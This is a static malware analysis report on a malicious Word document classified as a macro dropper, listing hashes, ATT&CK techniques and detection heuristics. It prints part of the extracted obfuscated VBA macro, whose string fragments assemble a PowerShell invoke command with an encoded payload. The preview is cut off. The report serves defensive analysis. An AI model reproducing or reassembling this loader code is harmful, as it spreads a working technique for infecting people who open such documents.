Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 354484c79eb432c0…

MALICIOUS

Office (OLE)

Size: 226.5 KB
Created: 2018-06-25 21:30:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23

MD5: 3a7c280e5577440adb00c8ed0c26ad71
SHA-1: 114300fe062791c0288ce084743cd215764fdc41
SHA-256: 354484c79eb432c0fde6f5e38f7ff3498e614011d4020ba60a373a6b9736417f

Risk score: 242

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro calls the Shell() function, indicating an attempt to execute an external command. The ClamAV detection name 'Doc.Dropper.Agent-6591766-0' further supports its classification as a dropper. The macro's obfuscated string concatenation suggests it is assembling a command to download and execute a payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6591567-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6591567-0
  • VBA macros detected [medium; 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11872 bytes
SHA-256: a738b5486abefdb1891f87f9d1eb9bcd5d29886a36e1487ed91a81db21580b30

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "MzjnOAfqAwLw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AnvspRWbQs"
Function OTRhwz()
On Error Resume Next
RjFRF = CByte(99965 * Tan(74284) / 95300 + CLng(qTRav * 80442 * 143 * Chr(23643)))
IRFbZ = (38961 / CBool(28868) + 71756 + CSng(XjisS) * (4376 - BTbGj + 16460 - CLng(qtHbvB)))
KuYKqhwP = "Hell" + "  &" + Chr(40) + Chr(40) + "var" + "iabLE " + "'*MDr*'" + Chr(41) + ".Nam" + "E["
AtvfO = CByte(48347 * Tan(74067) / 4650 + CLng(ijFfX * 29782 * 93290 * Chr(96460)))
jcWPiW = (70697 / CBool(99014) + 40057 + CSng(iSsTj) * (11917 - AYbNC + 36641 - CLng(EkmSh)))
oXBQwY = "3,11,2]" + "-jOI" + "n''" + Chr(41) + Chr(40) + " " + Chr(40) + " '4M67w1" + "16%" + "102M29C" + "78L6"
hUqpbk = (66568 / CBool(57959) + 18706 + CSng(KtkSR) * (37158 - oWNFK + 37850 - CLng(wpvIX)))
oImnkN = CByte(22024 * Tan(21398) / 34495 + CLng(wkPUr * 16295 * 97741 * Chr(26081)))
nvssKZRq = "9<87L13Q" + "79Q66L" + "74Q" + "69L" + "67Q84" + "Q0C1" + "10i6" + "9<84%14A" + "119A" + "69"
LJbZku = (45324 / CBool(1512) + 75517 + CSng(mpaHOd) * (4138 - wiEHD + 43140 - CLng(QUuzK)))
qhULlN = CByte(67003 * Tan(3561) / 86115 + CLng(MYUfV * 42535 * 56893 * Chr(1805)))
qQwjVNjJdl = "L66A" + "99%76" + "i73w" + "69" + "%78w84A2" + "7Q" + "4B116%" + "100L7" + "2L29B7" + "Q72Q84"
pBCfjD = (12251 / CBool(9021) + 25382 + CSng(ZcBcB) * (91720 - GvcQT + 10237 - CLng(Vrjjq)))
uqtIVo = CByte(78046 * Tan(5480) / 69896 + CLng(fIViS * 69104 * 21707 * Chr(91973)))
FawQQ = "A84Q80" + "i26%" + "15Q15L8" + "4B73" + "B68C6" + "5B8" + "4B6" + "9Q" + "67M72" + "C78B73"
jOPhY = (50538 / CBool(43118) + 92271 + CSng(JsUXNW) * (47776 - isHMHE + 42222 - CLng(zHzXll)))
nQGcfJ = CByte(41799 * Tan(66494) / 97625 + CLng(qtsnIu * 98579 * 17951 * Chr(69109)))
YjnOCjzQPHh = "B6" + "7B" + "65i76C1" + "4M67w7" + "9A77<15" + "C104Q98i"
SoFcK = (88201 / CBool(87541) + 51487 + CSng(YYMXM) * (62335 - GttZN + 19119 - CLng(UQKdB)))
MwNBkN = CByte(98477 * Tan(20090) / 57853 + CLng(lPuPa * 37917 * 57004 * Chr(42859)))
XaRvipU = "25" + "%115" + "w1" + "03w" + "15L96A" + "72A84i8" + "4A" + "80C26M1"
GBnFPK = (77008 / CBool(16988) + 62019 + CSng(MzPslG) * (50684 - Lmwhw + 55575 - CLng(IKSuiA)))
owunYt = CByte(96751 * Tan(82901) / 93726 + CLng(SYRSV * 44901 * 18203 * Chr(18839)))
uqmkcB = "5B15" + "M83A" + "72" + "C85A78M7" + "4Q73Q14" + "<79" + "%8" + "2B71" + "L15%87" + "i79" + "M82C68" + "M80B8"
IRjhZE = (21132 / CBool(57122) + 13137 + CSng(VOzlZK) * (34415 - zhhMUp + 88585 - CLng(XLInm)))
kirUE = CByte(32329 * Tan(40788) / 67258 + CLng(Prrap * 40596 * 75758 * Chr(85608)))
qRhIUSh = "2%69i83" + "<83M15M" + "110Q107" + "M98w" + "105" + "A15" + "i96B7" + "2<84w84" + "B8"
OTRhwz = KuYKqhwP + oXBQwY + nvssKZRq + qQwjVNjJdl + FawQQ + YjnOCjzQPHh + XaRvipU + uqmkcB + qRhIUSh
DZLcS = (92284 / CBool(94867) + 88318 + CSng(LhzVTM) * (25530 - PtEGBc + 28046 - CLng(RVdPE)))
kSAkNw = CByte(14926 * Tan(31439) / 91935 + CLng(KdKBN * 89093 * 46364 * Chr(58518)))
End Function
Function sNdwfLnCV()
On Error Resume Next
LFtoB = (4321 / CBool(95032) + 94858 + CSng(AaUii) * (34736 - hUjzQW + 97622 - CLng(jvXSMF)))
zwBsn = CByte(81510 * Tan(58381) / 97973 + CLng(PzwPVD * 61200 * 89755 * Chr(84517)))
dZvfULtOn = "0B2" + "6C15%15" + "<87A87w" + "87w1" + "4B80%72%" + "65" + "i78B" + "77i73"
jZoiz = (78402 / CBool(13919) + 92744 + CSng(GifkD) * (55764 - VdqiGD + 41309 - CLng(jRYic)))
PcaIZz = CByte(15891 * Tan(38773) / 8570 + CLng(fuWsD * 70529 * 28826 * Chr(90570)))
FzAqSzcAFbm = "B78i" + "72L72M85" + "Q89L14Q6" + "7i79" + "w7" + "7i" + "15L"
riCENw = (56702 / CBool(8515) + 75945 + CSng(fQYTiq) * (3930 - cifVA + 48096 - CLng(zMjcwz)))
cwluN = CByte(46775 * Tan(25728) / 19458 + CLng(tUZYnH * 51092 * 85284 * Chr(4605)))
fziHDDQ = "22" + "L10" + "6Q9" + "0L8" + "9M24M" + "102<15" + "C96<7"
jmQHW = (64369 / CBool(56449) + 34989 + CSng(lzbpv) * (572
... (truncated)